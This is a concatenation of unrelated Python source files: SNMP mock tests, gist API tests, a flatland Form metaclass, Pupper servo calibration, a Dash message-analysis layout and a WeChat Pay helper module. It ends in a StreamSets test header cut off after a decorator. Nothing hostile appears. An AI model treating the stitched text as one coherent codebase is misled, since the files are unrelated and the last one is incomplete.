    """Class for snmp_manager.Query mock.

    The methods below are empty stubs: they exist only so `Mock(spec=Query)`
    exposes the right attribute names; return values are supplied per-test
    via `configure_mock`.

    A detailed tutorial about Python mocks can be found here:
    http://www.drdobbs.com/testing/using-mocks-in-python/240168251
    """

    def query(self):
        """Do an SNMP query."""
        pass

    def oid_exists(self):
        """Determine existence of OID on device."""
        pass

    def swalk(self):
        """Do a failsafe SNMPwalk."""
        pass
class KnownValues(unittest.TestCase):
    """Checks all functions and methods."""

    #########################################################################
    # General object setup
    #########################################################################

    # SNMPwalk results used by Mocks.

    # Normalized walk returning integers
    # (presumably keyed by interface ifIndex with duplex-status values;
    # confirm against the ESSSWITCH MIB)
    nwalk_results_integer = {
        100: 1234,
        200: 5678
    }

    def test_supported(self):
        """Testing method / function supported."""
        # Set the stage for oid_exists returning True
        snmpobj = Mock(spec=Query)
        mock_spec = {'oid_exists.return_value': True}
        snmpobj.configure_mock(**mock_spec)
        # Test supported
        testobj = testimport.init_query(snmpobj)
        self.assertEqual(testobj.supported(), True)
        # Set the stage for oid_exists returning False
        mock_spec = {'oid_exists.return_value': False}
        snmpobj.configure_mock(**mock_spec)
        # Test unsupported
        testobj = testimport.init_query(snmpobj)
        self.assertEqual(testobj.supported(), False)

    def test_layer1(self):
        """Testing method / function layer1."""
        # Initializing key variables
        expected_dict = {
            100: {'swPortDuplexStatus': 1234},
            200: {'swPortDuplexStatus': 5678}
        }
        # Set the stage for SNMPwalk
        snmpobj = Mock(spec=Query)
        mock_spec = {'swalk.return_value': self.nwalk_results_integer}
        snmpobj.configure_mock(**mock_spec)
        # Get results
        testobj = testimport.init_query(snmpobj)
        results = testobj.layer1()
        # Basic testing of results
        for primary in results.keys():
            for secondary in results[primary].keys():
                self.assertEqual(
                    results[primary][secondary],
                    expected_dict[primary][secondary])

    def test_swportduplexstatus(self):
        """Testing method / function swportduplexstatus."""
        # Set the stage for SNMPwalk
        snmpobj = Mock(spec=Query)
        mock_spec = {'swalk.return_value': self.nwalk_results_integer}
        snmpobj.configure_mock(**mock_spec)
        # Get results
        testobj = testimport.init_query(snmpobj)
        results = testobj.swportduplexstatus()
        # Basic testing of results
        for key in results.keys():
            self.assertEqual(isinstance(key, int), True)
        # Test that we are getting the correct OID
        results = testobj.swportduplexstatus(oidonly=True)
        self.assertEqual(results, '.1.3.6.1.4.1.437.1.1.3.3.1.1.30')
if __name__ == '__main__':
    # Run the unit tests when this file is executed directly.
    unittest.main()
|
# encoding: utf-8
from base import APITestCase
from vilya.libs.store import store
from vilya.models.gist_comment import GistComment
class GistTest(APITestCase):
    """API tests for gist endpoints: CRUD, starring, forking and comments."""

    def setUp(self):
        """Create three gists (two owners) and two API tokens as fixtures."""
        # Clear leftover star rows so star-related assertions start clean.
        store.execute('delete from gist_stars where id<10')
        super(GistTest, self).setUp()
        self.gist1 = self._add_gist(
            description='this is my first gist',
            owner_id='xutao'
        )
        self.gist2 = self._add_gist(
            description='this is my second gist',
            owner_id='xutao'
        )
        self.gist3 = self._add_gist(
            description='this is my second gist',
            owner_id='lisong_intern',
            gist_names=["gistname1.txt", "gistname2.txt"],
            gist_contents=["first", "second"]
        )
        # NOTE(review): '<PASSWORD>' looks like a scrubbed fixture value —
        # confirm the intended user identifiers for these tokens.
        self.api_token = self.create_api_token('<PASSWORD>')
        self.api_token2 = self.create_api_token('<PASSWORD>')

    def test_your_gists(self):
        """GET /api/gists/ lists the caller's gists."""
        ret = self.app.get(
            "/api/gists/",
            status=200,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        # NOTE(review): asserts 10 although only 3 gists are created above —
        # presumably APITestCase.setUp seeds more; confirm.
        self.assertEquals(len(ret), 10)

    def test_your_starred_gists(self):
        """Starring a gist makes it appear in /api/gists/starred."""
        ret = self.app.put(
            "/api/gists/%s/star" % self.gist1.id,
            status=204,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        )
        ret = self.app.get(
            "/api/gists/starred",
            status=200,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertEquals(len(ret), 1)

    def test_get_a_not_exist_gist(self):
        """Fetching an unknown gist id yields a 404 not_found problem."""
        ret = self.app.get(
            "/api/gists/%s/" % "444444444",
            status=404,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertProblemType(ret['type'], "not_found")
        self.assertTrue("gist" in ret["message"])

    def test_get_single_gist(self):
        """A gist payload exposes description, files, url and public flag."""
        ret = self.app.get(
            "/api/gists/%s/" % self.gist1.id,
            status=200,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertTrue('description' in ret)
        self.assertTrue('files' in ret)
        self.assertTrue('url' in ret)
        self.assertEquals(ret["public"], True)

    def test_get_single_gist_src(self):
        """GET .../src returns path/type metadata and a list of sources."""
        ret = self.app.get(
            "/api/gists/%s/src" % self.gist3.id,
            status=200,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertTrue('path' in ret)
        self.assertTrue('type' in ret)
        self.assertTrue(isinstance(ret['src'], list))

    def test_get_single_gist_source(self):
        """GET .../source returns the raw source list."""
        ret = self.app.get(
            "/api/gists/%s/source" % self.gist3.id,
            status=200,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertTrue(isinstance(ret['source'], list))

    def test_create_a_gist(self):
        """POST /api/gists/ creates a gist with the given files."""
        description = "my gist"
        filename1 = "file1.txt"
        filename2 = "gist.md"
        content1 = "sent from icode"
        content2 = "##sent from icode"
        ret = self.app.post_json(
            "/api/gists/",
            dict(description="my gist", files={
                filename1: {"content": content1},
                filename2: {"content": content2}
            }),
            status=201,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertEquals(ret['description'], description)
        self.assertTrue(filename1 in ret["files"])
        self.assertTrue(filename2 in ret["files"])

    def test_create_a_private_gist(self):
        """A private gist is hidden (403) from other users' tokens."""
        filename1 = "file1.txt"
        filename2 = "gist.md"
        content1 = "sent from icode"
        content2 = "##sent from icode"
        ret = self.app.post_json(
            "/api/gists/",
            dict(description="my gist", public=False, files={
                filename1: {"content": content1},
                filename2: {"content": content2}
            }),
            status=201,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        gist_id = ret["id"]
        self.assertEquals(ret['public'], False)
        # A different user's token must be rejected with 403.
        ret = self.app.get(
            "/api/gists/%s/" % gist_id,
            status=403,
            headers=dict(Authorization="Bearer %s" % self.api_token2.token)
        )

    def test_edit_a_gist(self):
        """PATCH updates the description (and file contents) of a gist."""
        filename1 = "file1.txt"
        filename2 = "gist.md"
        content1 = "sent from icode"
        content2 = "##sent from icode"
        ret = self.app.post_json(
            "/api/gists/",
            dict(description="my gist", files={
                filename1: {"content": content1},
                filename2: {"content": content2}
            }),
            status=201,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        gist_id = ret["id"]
        new_description = "new gist"
        new_content1 = "########sent from icode"
        ret = self.app.patch_json(
            "/api/gists/%s/" % gist_id,
            dict(description=new_description, files={
                filename1: {"content": new_content1}
            }),
            status=200,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertEquals(ret['description'], new_description)
        # self.assertEquals(new_content1, self.app.get(
        #     ret["files"][filename1]['raw_url']).body)
        # self.assertEquals(content2, self.app.get(
        #     ret["files"][filename2]['raw_url']).body)

    def test_star_a_gist(self):
        """PUT .../star stars a gist; GET .../star then returns 204."""
        self.app.put(
            "/api/gists/%s/star" % self.gist1.id,
            status=204,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        )
        self.app.get(
            "/api/gists/%s/star" % self.gist1.id,
            status=204,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        )

    def test_unstar_a_gist(self):
        """DELETE .../star unstars; GET .../star then returns 404."""
        self.app.delete(
            "/api/gists/%s/star" % self.gist1.id,
            status=204,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        )
        self.app.get(
            "/api/gists/%s/star" % self.gist1.id,
            status=404,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        )

    def test_fork_a_gist(self):
        """POST .../forks by another user creates a fork and returns its url."""
        ret = self.app.post(
            "/api/gists/%s/forks" % self.gist1.id,
            status=201,
            headers=dict(Authorization="Bearer %s" % self.api_token2.token)
        ).json
        self.assertTrue('url' in ret)

    def test_delete_a_gist(self):
        """DELETE removes the gist; a later GET returns 404."""
        self.app.delete(
            "/api/gists/%s/" % self.gist1.id,
            status=204,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        )
        self.app.get(
            "/api/gists/%s/" % self.gist1.id,
            status=404,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        )

    def test_get_gist_comments(self):
        """GET .../comments/ lists comments previously added to the gist."""
        GistComment.add(self.gist1.id, 'xutao', "sent from iCode")
        GistComment.add(
            self.gist1.id, 'chengeng', "sent from Code for Android")
        ret = self.app.get(
            "/api/gists/%s/comments/" % self.gist1.id,
            status=200,
            headers=dict(Authorization="Bearer %s" % self.api_token.token)
        ).json
        self.assertEquals(len(ret), 2)
|
<reponame>wheeler-microfluidics/flatland-fork<gh_stars>0
# -*- coding: utf-8; fill-column: 78 -*-
"""Class attribute-style declarative schema construction."""
from flatland.schema.base import Element
from flatland.schema.containers import Dict
__all__ = 'Form',
class _MetaForm(type):
    """Allows fields to be specified as class attribute declarations.

    Processes class declarations of the form:

      from flatland import Form, String

      class MyForm(Form):
          name = String
          favorite_color = String.using(optional=True)

    and converts them to a :attr:`~flatland.Dict.field_schema` specification
    at class construction time.  Forms may inherit from other Forms, with
    schema declarations following normal Python class property inheritance
    semantics.
    """

    def __new__(self, class_name, bases, members):
        fields = _ElementCollection()
        # collect existing fields from super classes in __mro__ order
        for base in bases:
            fields.add_unseen(getattr(base, 'field_schema', ()))
        # add / replace fields supplied in a field_schema on this class
        fields.add_and_overwrite(members.get('field_schema', ()))
        # add / replace fields declared as attributes on this class
        declared_fields = []
        # Iterate over a snapshot: entries are deleted from *members* inside
        # the loop, and mutating a dict during items() iteration raises
        # RuntimeError on Python 3 (Python 2's items() returned a list, which
        # made the original code safe only by accident).
        for name, value in list(members.items()):
            # TODO warn about instances found here?
            if isinstance(value, type) and issubclass(value, Element):
                if name != value.name:
                    value = value.named(name)
                declared_fields.append(value)
                del members[name]
        fields.add_and_overwrite(declared_fields)
        # the new type's field_schema is the final result of all this
        members['field_schema'] = fields.elements
        return type.__new__(self, class_name, bases, members)
class _ElementCollection(object):
    """Internal helper collection for calculating Form field inheritance."""

    def __init__(self):
        self.elements = []
        self.names = set()

    def add_unseen(self, iterable):
        """Add items from *iterable* whose names are not already present."""
        for element in iterable:
            if element.name not in self.names:
                self.names.add(element.name)
                self.elements.append(element)

    def add_and_overwrite(self, iterable):
        """Add from *iterable*, replacing existing items of the same name."""
        for element in iterable:
            if element.name in self.names:
                # Drop the previously-registered element of this name; the
                # replacement is appended at the end of the list.
                match = next(
                    (have for have in self.elements if have.name == element.name),
                    None)
                if match is not None:
                    self.elements.remove(match)
            self.names.add(element.name)
            self.elements.append(element)
class Form(Dict):
    """A declarative collection of named fields.

    Forms behave like :class:`flatland.Dict`, but are defined with Python
    class syntax:

    .. doctest::

      >>> from flatland import Form, String
      >>> class HelloForm(Form):
      ...     hello = String
      ...     world = String
      ...

    Fields are assigned names from the declaration.  If a named schema is
    used, a renamed copy will be assigned to the Form.

    .. doctest::

      >>> class HelloForm(Form):
      ...     hello = String.named('hello')    # redundant
      ...     world = String.named('goodbye')  # will be renamed 'world'
      ...
      >>> form = HelloForm()
      >>> sorted(form.keys())
      [u'hello', u'world']

    Forms may embed other container fields and other forms:

    .. doctest::

      >>> from flatland import List
      >>> class BigForm(Form):
      ...     main_hello = HelloForm
      ...     alt_hello = List.of(String.named('alt_name'),
      ...                         HelloForm.named('alt_hello'))
      ...

    This would create a form with one ``HelloForm`` embedded as
    ``main_hello``, and a list of zero or more dicts, each containing an
    ``alt_name`` and another ``HelloForm`` named ``alt_hello``.

    Forms may inherit from other Forms or Dicts.  Field declared in a subclass
    will override those of a superclass.  Multiple inheritance is supported.

    The special behavior of ``Form`` is limited to class construction time
    only.  After construction, the ``Form`` acts exactly like a
    :class:`~flatland.Dict`.  In particular, fields declared in class
    attribute style do **not** remain class attributes.  They are removed from
    the class dictionary and placed in the
    :attr:`~flatland.Dict.field_schema`:

    .. doctest::

      >>> hasattr(HelloForm, 'hello')
      False
      >>> sorted([field.name for field in HelloForm.field_schema])
      [u'hello', u'world']

    The order of ``field_schema`` after construction is undefined.
    """

    # Python 2 metaclass hook: _MetaForm moves declared fields into
    # field_schema at class construction time.  Under Python 3 this would
    # need `class Form(Dict, metaclass=_MetaForm)` instead.
    __metaclass__ = _MetaForm

    # TODO:
    # some kind of validator merging helper? or punt?
|
import pigpio
from pupper.HardwareInterface import HardwareInterface
from pupper.Config import PWMParams, ServoParams
import numpy as np
def get_motor_name(i, j):
    """Return a readable name such as "abduction front-right" for motor (i, j)."""
    axis_names = {0: "abduction", 1: "inner", 2: "outer"}  # Top # Bottom
    leg_names = {0: "front-right", 1: "front-left", 2: "back-right", 3: "back-left"}
    return "{} {}".format(axis_names[i], leg_names[j])
def get_motor_setpoint(i, j):
    """Return the calibration reference angle (degrees) for motor (i, j)."""
    # Row 0 (abduction) is calibrated at 0 degrees, rows 1-2 at 45 degrees.
    setpoints = np.array([[0, 0, 0, 0], [45, 45, 45, 45], [45, 45, 45, 45]])
    return setpoints[i, j]
def degrees_to_radians(input_array):
    """Convert degrees to radians.

    Parameters
    ----------
    input_array : Numpy array or float
        Angle(s) in degrees.

    Returns
    -------
    Numpy array or float
        Angle(s) in radians.
    """
    return input_array * (np.pi / 180.0)
def step_until(hardware_interface, axis, leg, set_point):
    """Interactively nudge one link until the user confirms it is aligned.

    Returns
    -------
    Float
        Angle offset needed to correct the link.
    """
    set_names = ["horizontal", "horizontal", "vertical"]
    prompt = (
        "Enter 'a' or 'b' to move the link until it is **"
        + set_names[axis]
        + "**. Enter 'd' when done. Input: "
    )
    offset = 0
    while True:
        move_input = str(input(prompt))
        if move_input == "d":
            break
        if move_input == "a":
            offset += 1.0
        elif move_input == "b":
            offset -= 1.0
        else:
            # Unrecognized key: re-prompt without moving the servo.
            continue
        hardware_interface.set_actuator_position(
            degrees_to_radians(set_point + offset),
            axis,
            leg,
        )
    print("Offset: ", offset)
    return offset
def calibrate_angle_offset(hardware_interface):
    """Calibrate the angle offset for the twelve motors on the robot.

    Parameters
    ----------
    hardware_interface : HardwareInterface
        Robot hardware interface.  Its `servo_params` member is updated
        in-place with the calibrated scaling constant and neutral angles.
    """
    # Found K value of (11.4)
    k = float(
        input("Enter the scaling constant for your servo. This constant is how much you have to increase the pwm pulse width (in microseconds) to rotate the servo output 1 degree. (It is 11.333 for the newer CLS6336 and CLS6327 servos). Input: ")
    )
    # Convert microseconds-per-degree to microseconds-per-radian.
    hardware_interface.servo_params.micros_per_rad = k * 180 / np.pi
    hardware_interface.servo_params.neutral_angle_degrees = np.zeros((3, 4))
    for leg_index in range(4):
        for axis in range(3):
            # Loop until we're satisfied with the calibration
            completed = False
            while not completed:
                motor_name = get_motor_name(axis, leg_index)
                print("\n\nCalibrating the **" + motor_name + " motor **")
                set_point = get_motor_setpoint(axis, leg_index)
                # Zero out the neutral angle
                hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index] = 0
                # Move servo to set_point angle
                hardware_interface.set_actuator_position(
                    degrees_to_radians(set_point),
                    axis,
                    leg_index,
                )
                # Adjust the angle using keyboard input until it matches the reference angle
                offset = step_until(
                    hardware_interface, axis, leg_index, set_point
                )
                print("Final offset: ", offset)
                # The upper leg link has a different equation because we're calibrating to make it horizontal, not vertical
                if axis == 1:
                    hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index] = set_point - offset
                else:
                    hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index] = -(set_point + offset)
                print("Calibrated neutral angle: ", hardware_interface.servo_params.neutral_angle_degrees[axis, leg_index])
                # Send the servo command using the new beta value and check that it's ok
                hardware_interface.set_actuator_position(
                    degrees_to_radians([0, 45, -45][axis]),
                    axis,
                    leg_index,
                )
                okay = ""
                prompt = "The leg should be at exactly **" + ["horizontal", "45 degrees", "45 degrees"][axis] + "**. Are you satisfied? Enter 'yes' or 'no': "
                while okay not in ["yes", "no"]:
                    okay = str(
                        input(prompt)
                    )
                completed = okay == "yes"
def main():
    """Run the interactive servo calibration routine and print the results."""
    hardware_interface = HardwareInterface()
    calibrate_angle_offset(hardware_interface)
    print("\n\n CALIBRATION COMPLETE!\n")
    print("Calibrated neutral angles:")
    print(hardware_interface.servo_params.neutral_angle_degrees)
    print("Copy these values into the NEUTRAL_ANGLE_DEGREES matrix defined pupper/HardwareConfig.py")
    print("Set the MICROS_PER_RAD value in pupper/HardwareConfig.py to whatever you defined in the beginning of this program as well.")


# Guard the entry point: previously main() ran unconditionally at import
# time, which would start the interactive calibration whenever this module
# was imported (e.g. to reuse the helper functions above).
if __name__ == "__main__":
    main()
|
<reponame>julienschuermans/fb-analysis
import logging
import plotly.express as px
import dash_core_components as dcc
import dash_html_components as html
from modules.network import plot_graph
from modules.messages import *
from config import MY_NAME
def get_layout(df):
    """Build the top-level Dash layout: title, summary line and the tab bar.

    The `tab-output` div is empty here; presumably a callback renders the
    selected tab's body into it — confirm in the app module.
    """
    total_sent = len(df.loc[df.sender_name == MY_NAME])
    total_received = len(df.loc[df.sender_name != MY_NAME])
    first_message_date = df.timestamp.min().strftime('%d-%m-%Y')
    last_message_date = df.timestamp.max().strftime('%d-%m-%Y')
    layout = html.Div(children=[
        html.H1(children='Facebook Messages'),
        html.Div(children=f'''
            Explore {total_sent} messages sent and {total_received} received between {first_message_date} and {last_message_date}
        '''),
        dcc.Tabs(children=[
            dcc.Tab(label='Personal Stats', value="1"),
            dcc.Tab(label='Chat Analysis', value="2"),
            dcc.Tab(label='Contact Info', value="3"),
            dcc.Tab(label='Network Graph', value="4"),
            dcc.Tab(label='Photo Viewer', value="5"),
        ],
            value="1",  # default to the 'Personal Stats' tab
            id='tabs'
        ),
        html.Div(id='tab-output')
    ])
    return layout
def get_tab1(df):
    """Build the 'Personal Stats' tab: sent/received totals, a weekly
    activity heatmap and per-contact message counts.

    Graphs declared without a `figure=` are presumably populated by
    callbacks keyed on their ids — confirm in the app module.
    """
    contact_counts = get_total_msg_count_per_contact(df)
    weekly_pattern = get_weekly_activity_pattern(df)
    tab1 = [
        html.H4('#Messages sent/received'),
        html.Label('Select a timeframe'),
        dcc.Dropdown(style={'width': '49%', 'display': 'inline-block'},
                     id='global-timeframe-dropdown',
                     options=[
                         {'label': item, 'value': item} for item in ['Hourly', 'Daily', 'Monthly', 'Yearly']
                     ],
                     value='Monthly'
                     ),
        dcc.Graph(id='sent-received-bar-graph'),
        html.H4('Weekly activity'),
        # The transpose puts days on the y-axis; assumes weekly_pattern is
        # indexed (hour, day) — TODO confirm orientation of the helper.
        dcc.Graph(
            id='weekly-activity-heatmap',
            figure=px.imshow(weekly_pattern.T,
                             labels=dict(
                                 y="Day of Week", x="Time of Day", color="#Messages sent"),
                             y=['Monday', 'Tuesday', 'Wednesday',
                                'Thursday', 'Friday', 'Saturday', 'Sunday'],
                             x=[str(x)+'h' for x in range(24)]
                             )
        ),
        html.H4('#Messages per contact'),
        dcc.Graph(id='contact-count-bar-graph',
                  figure={
                      'data': [
                          {
                              'x': contact_counts['theirs'][0],
                              'y': contact_counts['theirs'][1],
                              'type': 'bar',
                          },
                      ],
                  }
                  ),
    ]
    return tab1
def get_tab2(df):
    """Build the 'Chat Analysis' tab: per-chat message counts over time,
    hourly/weekly bars, participant shares and top words.

    Components declared with only an id (graphs and the table) are
    presumably filled in by callbacks — confirm in the app module.
    """
    tab2 = [
        html.Div(children=[
            html.Label('Select a chat', style={
                'width': '49%', 'display': 'inline-block'}),
            html.Label('Select a timeframe', style={
                'width': '49%', 'display': 'inline-block'}),
        ]),
        html.Div(children=[
            dcc.Dropdown(style={'width': '49%', 'display': 'inline-block'},
                         id='chat-dropdown',
                         options=[
                             {'label': title, 'value': title} for title in list_chat_titles(df)
                         ],
                         value=list_chat_titles(df)[0]
                         ),
            dcc.Dropdown(style={'width': '49%', 'display': 'inline-block'},
                         id='timeframe-dropdown',
                         options=[
                             {'label': item, 'value': item} for item in ['Hourly', 'Daily', 'Monthly', 'Yearly']
                         ],
                         value='Monthly'
                         ),
        ]),
        dcc.Graph(id='msg-count-lines'),
        html.Div(children=[
            dcc.Graph(style={'width': '49%', 'display': 'inline-block'},
                      id='hourly-bars'),
            dcc.Graph(style={'width': '49%', 'display': 'inline-block'},
                      id='weekly-bars'),
        ]),
        html.H4('#Messages per participant'),
        dcc.Graph(id='participants-pie-chart'),
        html.H4('Top words per participant'),
        html.Table(id='top-words-table'),
    ]
    return tab2
def get_tab3(df):
    """Build the 'Contact Info' tab: a multi-select of contacts and a stats table."""
    all_contacts = list_contacts(df)
    tab3 = [
        html.H4('Stats per contact'),
        html.Label('Select one or more contacts'),
        dcc.Dropdown(id='contact-select-dropdown',
                     options=[
                         {'label': contact, 'value': contact} for contact in all_contacts],
                     value=all_contacts[:5],  # preselect the first five contacts
                     multi=True
                     ),
        html.Table(id='contacts-table'),  # presumably filled by a callback — confirm
    ]
    return tab3
def get_tab4(G):
    """Build the 'Network Graph' tab: a single figure of contact interactions."""
    return [
        html.H4('Network Interactions'),
        dcc.Graph(figure=plot_graph(G)),
    ]
def get_tab5(df_photos):
    """Build the 'Photo Viewer' tab: a chat selector, image pane and a slider."""
    # Default to the first chat, with its photos in chronological order.
    photos_selection = filter_df_on_title(
        df_photos, list_chat_titles(df_photos)[0])
    photos_selection = photos_selection.sort_values('timestamp')
    # NOTE(review): this list is computed but never used in this function —
    # presumably callbacks recompute it; confirm before removing.
    list_of_filenames = photos_selection.photo_uri.tolist()
    tab5 = [
        html.Label('Select a chat'),
        dcc.Dropdown(id='chat-dropdown-media',
                     options=[
                         {'label': title, 'value': title} for title in list_chat_titles(df_photos)
                     ],
                     value=list_chat_titles(df_photos)[0]
                     ),
        html.H4(id='img-count'),
        html.H4(id='img-details',
                style={
                    'text-align': 'center',
                    'vertical-align': 'middle',
                }),
        html.Div(id='img-container'),
        html.H5(id='img-date',
                style={
                    'margin-bottom': '20px',
                    'text-align': 'center',
                    'vertical-align': 'middle',
                }),
        html.Div(
            children=[
                # Slider max is left unset; presumably set by a callback
                # based on the number of photos in the selected chat.
                dcc.Slider(
                    id='my-slider',
                    min=0,
                    step=1
                ),
            ],
            style={
                'margin-bottom': '50px',
                'margin-right': '20px',
                'margin-left': '20px',
            }
        ),
    ]
    return tab5
|
<filename>WeChatPayment.py
import random
import requests
import urllib.parse
import datetime
import hashlib
from random import Random
from bs4 import BeautifulSoup
from . import conf
def get_sign(data_dict, key):
    """Compute the WeChat Pay MD5 signature for a parameter dict.

    :param data_dict: parameters to sign, as a dict
    :param key: merchant API key, appended as the trailing ``&key=`` field
    :return: upper-case hex MD5 digest (str)
    """
    # WeChat requires parameters sorted by key name in ascending order.
    ordered = sorted(data_dict.items(), key=lambda item: item[0])
    query = "&".join(u"{}={}".format(k, v) for k, v in ordered) + '&key=' + key
    digest = hashlib.md5()
    digest.update(query.encode('utf-8'))
    return digest.hexdigest().upper()
def random_str(randomlength=8):
    """Generate a random alphanumeric string.

    :param randomlength: desired string length
    :return: random string drawn from upper/lower letters and digits
    """
    chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
    rng = Random()
    last_index = len(chars) - 1
    return ''.join(chars[rng.randint(0, last_index)] for _ in range(randomlength))
def trans_dict_to_xml(data_dict):
    """Serialize a flat dict into the ``<xml>...</xml>`` payload WeChat expects.

    Keys are emitted in sorted order; the ``detail`` field is wrapped in a
    CDATA section unless it already is one.
    """
    pieces = []
    for key in sorted(data_dict.keys()):
        value = data_dict.get(key)
        if key == 'detail' and not value.startswith('<![CDATA['):
            value = '<![CDATA[{}]]>'.format(value)
        pieces.append('<{key}>{value}</{key}>'.format(key=key, value=value))
    return '<xml>{}</xml>'.format(''.join(pieces))
def trans_xml_to_dict(data_xml):
    """Parse a WeChat Pay XML document into a flat dict.

    :param data_xml: XML string/bytes with a top-level ``<xml>`` element
    :return: dict of child tag name -> text; {} when no ``<xml>`` root exists
    """
    root = BeautifulSoup(data_xml, features='xml').find('xml')
    if not root:
        return {}
    return {node.name: node.text for node in root.find_all()}
def get_wechat_pay_url(order_id, total_fee, product_id, body, spbill_create_ip, redirect_url=conf.task_redirect_url):
    """Create a WeChat H5 (MWEB) payment order and return its pay URL.

    :param order_id: merchant order number (out_trade_no)
    :param total_fee: total amount in fen (must be an integer)
    :param product_id: product id
    :param body: product description
    :param spbill_create_ip: client IP address
    :param redirect_url: URL to redirect to after payment
    :return: the mweb pay URL with redirect appended, or None on failure
    """
    request_params = {
        'appid': conf.appid,                    # public-platform APPID
        'mch_id': conf.mch_id,                  # merchant id
        'nonce_str': random_str(),              # random nonce required by the API
        'out_trade_no': order_id,               # merchant order number
        'total_fee': total_fee,                 # total amount (fen, integer)
        'spbill_create_ip': spbill_create_ip,   # client IP
        'notify_url': conf.notify_url,          # server-to-server payment callback
        'body': body,                           # product description
        'product_id': product_id,               # product id
        'trade_type': 'MWEB',                   # H5 payment
        # NOTE(review): this dict is serialized via str() into the XML, producing
        # a Python dict repr rather than JSON -- confirm WeChat accepts it.
        'scene_info': {"h5_info": {"type": "Wap", "wap_url": "", "wap_name": ""}}
    }
    request_params['sign'] = get_sign(request_params, conf.api_key)
    payload = trans_dict_to_xml(request_params)
    # POST the signed XML to the unifiedorder endpoint.
    response = requests.request('post', 'https://api.mch.weixin.qq.com/pay/unifiedorder',
                                data=payload.encode('utf-8'))
    result = trans_xml_to_dict(response.content)
    mweb_url = result.get('mweb_url', None)
    if mweb_url:
        # Append the post-payment redirect target as a URL-encoded query param.
        mweb_url = mweb_url + '&' + urllib.parse.urlencode({'redirect_url': redirect_url})
    return mweb_url
def order_query(order_id):
    """Query the payment status of an order via WeChat Pay's orderquery API.

    :param order_id: merchant order number (out_trade_no)
    :return: dict parsed from the XML response
    """
    endpoint = 'https://api.mch.weixin.qq.com/pay/orderquery'
    request_params = {
        'appid': conf.appid,        # public-platform APPID
        'mch_id': conf.mch_id,      # merchant id
        'nonce_str': random_str(),  # random nonce required by the API
        'out_trade_no': order_id,   # merchant order number
    }
    request_params['sign'] = get_sign(request_params, conf.api_key)
    body = trans_dict_to_xml(request_params)
    # POST the signed XML and decode the XML reply into a dict.
    response = requests.request('post', endpoint, data=body.encode('utf-8'))
    return trans_xml_to_dict(response.content)
def enterprise_payment(order_id, openid, amount):
    """Transfer funds to a user's WeChat wallet (enterprise payment / withdrawal).

    :param order_id: withdrawal order id (partner_trade_no)
    :param openid: openid of the receiving user
    :param amount: amount to transfer
    :return: dict parsed from the XML response
    """
    endpoint = 'https://api.mch.weixin.qq.com/mmpaymkttransfers/promotion/transfers'
    payload = {
        'mch_appid': conf.appid,
        'mchid': conf.mch_id,
        'nonce_str': random_str(),
        'partner_trade_no': order_id,
        'openid': openid,
        'check_name': 'NO_CHECK',  # skip real-name verification of the payee
        'amount': amount,
        'desc': '收益提现'
    }
    payload['sign'] = get_sign(payload, conf.api_key)
    xml_body = trans_dict_to_xml(payload)
    # This endpoint requires the WeChat-Pay-issued merchant client certificate.
    response = requests.request('post', endpoint, data=xml_body.encode('utf-8'),
                                cert=(conf.WXPAY_CLIENT_CERT_PATH, conf.WXPAY_CLIENT_KEY_PATH))
    result = trans_xml_to_dict(response.content)
    print(result)
    return result
def enterprise_payment_query(order_id):
    """Query the result of an enterprise payment (transfer to user).

    :param order_id: order id of the transfer (partner_trade_no)
    :return: dict parsed from the XML response
    """
    # BUG FIX: `url` was previously undefined here, so this function always
    # raised NameError. This is the official transfer-result query endpoint.
    url = 'https://api.mch.weixin.qq.com/mmpaymkttransfers/gettransferinfo'
    nonce_str = random_str()
    # Per the gettransferinfo API, the request fields are 'appid'/'mch_id'
    # (the transfers endpoint used 'mch_appid'/'mchid' instead).
    postdata = {
        'appid': conf.appid,
        'mch_id': conf.mch_id,
        'nonce_str': nonce_str,
        'partner_trade_no': order_id
    }
    postdata['sign'] = get_sign(postdata, conf.api_key)  # sign the request
    xml = trans_dict_to_xml(postdata)  # serialize to XML
    # This API requires the client certificate issued by WeChat Pay.
    response = requests.request('post', url, data=xml.encode('utf-8'),
                                cert=(conf.WXPAY_CLIENT_CERT_PATH, conf.WXPAY_CLIENT_KEY_PATH))
    data_dict = trans_xml_to_dict(response.content)
    # Use .get(): error/malformed responses may omit 'status' and 'reason'.
    status = data_dict.get('status')
    if status == 'SUCCESS':
        print('成功')
    elif status == 'PROCESSING':
        print('处理中')
    else:
        print('失败')
        print(data_dict.get('reason'), '失败原因')
    return data_dict
|
<gh_stars>10-100
# Copyright 2020 StreamSets Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import string
import time
from datetime import datetime
from decimal import Decimal
import pytest
import sqlalchemy
from streamsets.testframework.markers import cluster, sdc_min_version
from streamsets.testframework.utils import get_random_string, Version
logger = logging.getLogger(__name__)
DEFAULT_KUDU_PORT = 7051
@cluster('cdh')
